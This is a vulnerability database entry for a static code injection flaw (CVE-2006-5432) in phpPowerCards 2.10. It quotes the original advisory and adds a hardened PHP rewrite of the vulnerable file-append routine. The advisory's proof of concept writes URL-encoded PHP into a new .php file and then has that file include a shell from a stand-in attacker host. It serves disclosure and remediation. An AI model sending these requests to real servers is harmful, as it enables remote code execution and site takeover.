PhpPowerCards 'txt.inc.php' Direct Static Code Injection Vulnerability

Vulnerability ID: 1111325    Vulnerability type: Input validation
Published: 2006-10-18    Updated: 2006-10-23
CVE ID: CVE-2006-5432    CNNVD ID: CNNVD-200610-354
Platform: PHP    CVSS score: 2.6
|Vulnerability source
https://www.exploit-db.com/exploits/2590
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-354
|Vulnerability details
Multiple direct static code injection vulnerabilities exist in db/txt.inc.php of phpPowerCards 2.10. When register_globals is enabled, a remote attacker can create or overwrite arbitrary files via the (1) email[to], (2) email[from], (3) name[to], (4) name[from], (5) picture, (6) comment, or (7) sessionID parameters, for example by creating a new .php file that performs remote file inclusion and then requesting that file.
|Exploit (EXP)
+-------------------------------------------------------------------------------------------
+ phpPowerCards 2.10 (txt.inc.php) Remote Code Execution Vulnerability
+-------------------------------------------------------------------------------------------
+ Affected Software .: phpPowerCards 2.10
+ Vendor ............: http://www.giombetti.com/
+ Download ..........: http://lu.download.giombetti.com/phpPowerCards/phppowercards2.10.zip
+ Description .......: "phpPowerCards is a powerfull PHP based postcard script."
+ Class .............: Remote Code Execution
+ Risk ..............: High (Remote Code Execution)
+ Found By ..........: nuffsaid <nuffsaid[at]newbslove.us>
+-------------------------------------------------------------------------------------------
+ Details:
+ phpPowerCards db/txt.inc.php does not initialize the $file variable before using it in the
+ fopen() function on line 10, after $file is opened it then writes several variables which
+ are also uninitialized to $file using the fputs() function. Assuming register_globals = on,
+ we can initialize these variables in a query string and then write anything to a file we
+ desire on the target box that's running phpPowerCards.
+ 
+ Vulnerable Code:
+ db/txt.inc.php, line(s) 10: $fp = fopen("$file","a");
+ db/txt.inc.php, line(s) 23: fputs($fp, $email[to]. "¦¦" .$email[from]. "¦¦" .$name[to]. "¦¦" .$name[from]. "¦¦" .$picture. "¦¦" .$comment. "¦¦" .$sessionID. "\n");
+ 
+ Proof of Concept:
+ http://[target]/[path]/db/txt.inc.php?file=[file]&check=0&email[to]=[evil code]
+ http://[target]/[path]/db/txt.inc.php?file=[file]&check=0&comment=[evil code]
+ ... same thing repeated for each variable in the second argument of fputs() on line 23
+ 
+ -> http://[target]/[path]/db/txt.inc.php?file=../evilfile.php&check=0&email[to]=+%3C%3Fphp+include%28%24evil_include%29%3B+%3F%3E+
+ -> http://[target]/[path]/evilfile.php?evil_include=http://evilsite.com/shell.php
+-------------------------------------------------------------------------------------------

# milw0rm.com [2006-10-18]
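The advisory's Details section pins the defect to two things: the destination file name and every written field come straight from the request (via register_globals), and the values are appended verbatim, so a request can pick the file and the bytes written into it. As an added illustration that is not phpPowerCards' own code, the snippet below shows the same append path rewritten so that none of those decisions are left to the client: the file path is a server-side constant (the path, the function names and the field limits are assumptions for this example), fields are read explicitly from $_POST instead of from globals, control characters and the record separator are stripped so a value cannot forge extra records, the picture field is limited to a whitelist pattern, and the session identifier is generated on the server.

```php
<?php
// Added example (not phpPowerCards' own code): a hardened version of the
// record-writing path described in the advisory. Names/paths are assumed.

// 1. The destination file is a fixed constant; it is never taken from the request.
//    (Assumed location; keep the real file outside the web root so it is not served.)
const CARD_DB_FILE = __DIR__ . '/cards.txt';

// 2. Record separator, mirroring the original fputs() format.
const FIELD_SEP = '||';

/**
 * Read one field from a named request array (e.g. email[to]) without relying
 * on register_globals. Returns null if absent or not a string.
 */
function request_field(array $src, string $group, string $key): ?string {
    if (!isset($src[$group]) || !is_array($src[$group])) {
        return null;
    }
    $v = $src[$group][$key] ?? null;
    return is_string($v) ? $v : null;
}

/**
 * Neutralise anything that could break the record format: control characters
 * (including CR/LF) and the separator itself. Also caps the length.
 */
function sanitize_field(?string $v, int $maxLen = 200): string {
    $v = substr((string)$v, 0, $maxLen);
    $v = preg_replace('/[\x00-\x1F\x7F]/', '', $v);
    return str_replace(FIELD_SEP, '%7C%7C', $v);
}

function validate_email(?string $v): string {
    $v = sanitize_field($v);
    return filter_var($v, FILTER_VALIDATE_EMAIL) !== false ? $v : '';
}

/**
 * Build one record from a request array and append it to the fixed file.
 * Returns the record written, or null if mandatory fields fail validation
 * or the file cannot be opened.
 */
function append_card_record(array $post, string $dbFile = CARD_DB_FILE): ?string {
    $emailTo   = validate_email(request_field($post, 'email', 'to'));
    $emailFrom = validate_email(request_field($post, 'email', 'from'));
    if ($emailTo === '' || $emailFrom === '') {
        return null;
    }

    // 3. picture must match a whitelist pattern; it is never used as a path.
    $picture = is_string($post['picture'] ?? null) ? $post['picture'] : '';
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}\.(jpg|png|gif)$/', $picture)) {
        $picture = '';
    }
    $comment = is_string($post['comment'] ?? null) ? $post['comment'] : '';

    $fields = [
        $emailTo,
        $emailFrom,
        sanitize_field(request_field($post, 'name', 'to'), 80),
        sanitize_field(request_field($post, 'name', 'from'), 80),
        $picture,
        sanitize_field($comment, 1000),
        // 4. Session id is assigned server-side, never taken from the request.
        bin2hex(random_bytes(16)),
    ];
    $record = implode(FIELD_SEP, $fields) . "\n";

    $fp = fopen($dbFile, 'a');
    if ($fp === false) {
        return null;
    }
    flock($fp, LOCK_EX);
    fputs($fp, $record);
    flock($fp, LOCK_UN);
    fclose($fp);
    return $record;
}

// Usage: only POST bodies are honoured; nothing in the query string
// influences which file is opened or what is written to it.
if (PHP_SAPI !== 'cli' && ($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    append_card_record($_POST);
}
```

The design choice worth noting is that the file name is not "validated" but removed from the request entirely: a whitelist on $file would still have to reason about traversal and extensions, whereas a constant leaves nothing for the client to influence. Stripping newlines and the separator matters independently of the file-name fix, since a writable text file that can be served with a .php extension is only one of the ways free-form bytes in a data file cause trouble.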
|References

BID 20620: http://www.securityfocus.com/bid/20620
OSVDB 29840: http://www.osvdb.org/29840
SECUNIA 22471: http://secunia.com/advisories/22471
MILW0RM 2590: http://milw0rm.com/exploits/2590
XF phppowercards-txt-code-execution(29669): http://xforce.iss.net/xforce/xfdb/29669
VUPEN ADV-2006-4105: http://www.frsirt.com/english/advisories/2006/4105